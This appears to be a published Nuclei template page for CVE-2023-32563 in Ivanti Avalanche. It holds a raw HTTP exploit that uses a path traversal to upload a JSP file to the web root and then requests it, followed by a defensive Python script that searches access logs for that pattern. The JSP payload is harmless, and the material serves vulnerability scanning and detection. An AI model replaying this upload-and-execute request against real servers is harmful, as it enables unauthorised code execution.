Ivanti Avalanche - Remote Code Execution
ID: CVE-2023-32563
Severity: critical
Author: princechaddha
Tags: cve,cve2023,ivanti,avalanche,rce,oast,unauth,intrusive
Description
An unauthenticated attacker could achieve code execution through a RemoteControl server.
YAML Source
```yaml
id: CVE-2023-32563

info:
  name: Ivanti Avalanche - Remote Code Execution
  author: princechaddha
  severity: critical
  description: An unauthenticated attacker could achieve the code execution through a RemoteControl server.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
  remediation: |
    Apply the latest security patches or updates provided by Ivanti to mitigate this vulnerability.
  reference:
    - https://twitter.com/wvuuuuuuuuuuuuu/status/1694956245742923939
    - https://forums.ivanti.com/s/article/Avalanche-Vulnerabilities-Addressed-in-6-4-1?language=en_US
    - https://nvd.nist.gov/vuln/detail/CVE-2023-32563
    - https://github.com/mayur-esh/vuln-liners
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-32563
    cwe-id: CWE-22
    epss-score: 0.34709
    epss-percentile: 0.97105
    cpe: cpe:2.3:a:ivanti:avalanche:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: ivanti
    product: avalanche
  tags: cve,cve2023,ivanti,avalanche,rce,oast,unauth,intrusive

http:
  - raw:
      - |
        POST /Servlet/Skins HTTP/1.1
        Host: {{Hostname}}
        Content-Length: 333
        Content-Type: multipart/form-data; boundary=------------------------eacf31f23ac1829f
        Connection: close

        --------------------------eacf31f23ac1829f
        Content-Disposition: form-data; name="guid"

        ../../../Web/webapps/ROOT
        --------------------------eacf31f23ac1829f
        Content-Disposition: form-data; name="file"; filename="{{randstr}}.jsp"

        <% out.println("CVE-2023-32563"); %>
        --------------------------eacf31f23ac1829f--
      - |
        GET /{{randstr}}.jsp HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body_2
        words:
          - "CVE-2023-32563"
# digest: 4a0a0047304502204732bf938009c9282fd39e8ad8e5889954c26716026799fa0ad618f0d2fe8a0f022100cf5e632ca9bad7d2291231c1da2c75f5c094f2539a34beadcd3b2520251389bf:922c64590222798bb761d5b6d8e72950
```
Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-32563.yaml"
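For defenders reviewing a server after the fact, the template's two-request sequence (a POST to /Servlet/Skins followed by a GET of a .jsp file directly under the web root) can be searched for in web access logs. The following is an added example, not part of the original template or of Nuclei; it assumes Common/Combined Log Format lines in time order, and the 10-minute window, function name and sample lines are constructed for illustration.

```python
import re
from datetime import datetime, timedelta

# Assumed log format: ip - - [time] "METHOD path proto" status ...
LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
UPLOAD_PATH = "/Servlet/Skins"                   # endpoint used by the template
ROOT_JSP = re.compile(r"^/[^/?]+\.jsp$", re.I)   # JSP directly under the web root
WINDOW = timedelta(minutes=10)                   # assumed correlation window


def find_upload_then_jsp(lines):
    """Return (ip, upload_time, jsp_path) for each POST to UPLOAD_PATH that the
    same client follows with a successful GET of a root-level JSP."""
    last_upload = {}  # ip -> time of that client's most recent upload POST
    findings = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        path = m["path"].split("?", 1)[0]  # ignore any query string
        ip = m["ip"]
        if m["method"] == "POST" and path.lower() == UPLOAD_PATH.lower():
            last_upload[ip] = ts
        elif (m["method"] == "GET" and ROOT_JSP.match(path)
              and m["status"] == "200" and ip in last_upload
              and ts - last_upload[ip] <= WINDOW):
            findings.append((ip, last_upload[ip].isoformat(), path))
    return findings


# Constructed sample log lines (not taken from a real server).
SAMPLE = [
    '198.51.100.7 - - [24/Aug/2023:10:15:01 +0000] "POST /Servlet/Skins HTTP/1.1" 200 12',
    '203.0.113.9 - - [24/Aug/2023:10:15:02 +0000] "GET /index.jsp HTTP/1.1" 200 5120',
    '198.51.100.7 - - [24/Aug/2023:10:15:03 +0000] "GET /2Xk9QpLmZr.jsp HTTP/1.1" 200 15',
    '198.51.100.7 - - [24/Aug/2023:10:15:04 +0000] "GET /static/app.css HTTP/1.1" 200 900',
    '192.0.2.44 - - [24/Aug/2023:11:00:00 +0000] "POST /Servlet/Skins HTTP/1.1" 403 0',
    '192.0.2.44 - - [24/Aug/2023:11:30:00 +0000] "GET /help.jsp HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for ip, when, path in find_upload_then_jsp(SAMPLE):
        print(f"{ip} posted to {UPLOAD_PATH} at {when}, then fetched {path}")
```

Correlating by client IP misses a follow-up request sent from a different address or through a proxy, so treat a hit as a lead and also check the web root for .jsp files that do not belong to the installation.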